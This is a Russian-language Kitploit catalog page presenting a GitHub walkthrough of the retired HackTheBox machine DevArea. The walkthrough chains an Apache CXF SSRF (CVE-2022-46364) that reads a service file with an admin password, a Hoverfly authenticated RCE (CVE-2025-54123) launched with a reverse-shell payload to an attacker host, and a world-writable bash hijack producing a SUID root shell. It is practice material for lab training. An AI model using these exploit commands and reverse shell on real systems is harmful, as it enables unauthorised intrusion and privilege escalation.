Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
devarea — Прохождение HackTheBox DevArea с цепочкой CVE-2022-46364 Apache CXF SSRF, CVE-2025-54123 Hoverfly RCE и перехватом SUID bash для повышения привилегий до root. | Kitploit
Инструменты/GitHubGitHub/ledksv/devarea
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingЛаборатории и Практика
GitHubledksv/devarea

devarea

Прохождение HackTheBox DevArea с цепочкой CVE-2022-46364 Apache CXF SSRF, CVE-2025-54123 Hoverfly RCE и перехватом SUID bash для повышения привилегий до root.

2 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

DevArea — HackTheBox

Платформа: HackTheBox ОС: Linux Статус: Retired — полный разбор опубликован.

Полный разбор: l3dsec.com/walkthroughs/devarea-htb


Цепочка атаки

root@kitploit:~
nmap → 21 (FTP anon) + 80 + 8080 (Jetty) + 8888 (Hoverfly)
  → FTP anon → employee-service.jar (Apache CXF, pre-3.5.5)
    → CVE-2022-46364 SSRF → file:///etc/systemd/system/hoverfly.service
      → admin credentials in ExecStart
        → CVE-2025-54123 Hoverfly RCE → shell as dev_ryan → user flag
          → /usr/bin/bash world-writable + sudo syswatch.sh calls it
            → bash hijack → SUID rootbash → root flag

1. Разведка

root@kitploit:~
nmap -sC -sV -p- <TARGET_IP>
# 21/tcp  open  ftp     vsftpd 3.0.5 (anonymous login)
# 8080/tcp open http    Jetty 9.4.27
# 8888/tcp open http    Hoverfly Dashboard

Анонимная загрузка по FTP из pub/ даёт employee-service.jar — SOAP-сервис Apache CXF, встроенная версия до 3.5.5.


2. CVE-2022-46364 (Apache CXF SSRF → чтение учётных данных)

CXF до 3.5.5 отражает URL-адреса XOP:Include href на стороне сервера — произвольное чтение файлов через file://.

root@kitploit:~
python3 CVE-2022-46364.py -t http://devarea.htb:8080/employeeservice -s file:///etc/systemd/system/hoverfly.service -d devarea.htb
# ExecStart: hoverfly -add -username admin -password O7IJ27MyyXiU
# User=dev_ryan

3. CVE-2025-54123 (Hoverfly Authenticated RCE)

Hoverfly 1.11.3 — аутентифицированный RCE через инъекцию конфигурации middleware.

root@kitploit:~
nc -lvnp 4444
./CVE-2025-54123.sh -t http://<TARGET_IP>:8888 -u admin -p O7IJ27MyyXiU -c "bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1"

Шелл от имени dev_ryan. Флаг пользователя в /home/dev_ryan/user.txt.


4. Повышение привилегий — подмена бинарника Bash

root@kitploit:~
sudo -l
# (root) NOPASSWD: /opt/syswatch/syswatch.sh
ls -la /usr/bin/bash
# -rwxrwxrwx  (world-writable)

syswatch.sh внутренне вызывает /usr/bin/bash. Заменяем его на скрипт, устанавливающий SUID:

root@kitploit:~
cp /usr/bin/bash /tmp/bash.bak
printf '#!/tmp/bash.bak\ncp /tmp/bash.bak /tmp/rootbash\nchmod 4755 /tmp/rootbash\n' > /usr/bin/bash
chmod +x /usr/bin/bash
sudo /opt/syswatch/syswatch.sh status
/tmp/rootbash -p
# euid=0(root)

Флаг root в /root/root.txt.


Флаги

ФлагЗначение
Userredacted
Rootredacted

Только для образовательных целей. Тестируйте только те системы, которыми владеете или на тестирование которых у вас есть явное письменное разрешение.

Скачать инструмент